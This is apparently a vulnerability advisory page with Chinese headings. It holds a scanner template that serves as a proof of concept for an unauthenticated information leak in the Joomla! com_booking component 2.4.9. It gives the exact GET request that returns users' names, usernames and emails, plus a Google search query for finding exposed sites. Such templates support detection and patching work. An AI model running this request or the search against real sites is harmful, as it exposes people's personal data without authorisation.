漏洞描述
Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
joomla-com-booking-component: Joomla! com_booking component 2.4.9 - Information Leak
PoC代码[已公开]
id: joomla-com-booking-component
info:
name: Joomla! com_booking component 2.4.9 - Information Leak
author: r3Y3r53
severity: high
description: |
Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems.
reference:
- https://www.exploit-db.com/exploits/51595
- http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
metadata:
verified: true
max-request: 1
google-query: inurl:"index.php?option=com_booking"
tags: joomla,info-leak,unauth,vuln
http:
- raw:
- |
GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"name":'
- '"username":'
- '"email":'
condition: and
- type: regex
part: body
regex:
- '^{.*}$'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: json
name: keys
part: body
json:
- 'keys'
# digest: 4b0a00483046022100a6f211644a2c169f11ba2bbff5d821f1fcea290d4819970a7cb8305dfac3bbd7022100fa98eec3f53a87e9c89951ed489cad0c3d9d7ed9616c37fce08468b07ef53b41:922c64590222798bb761d5b6d8e72950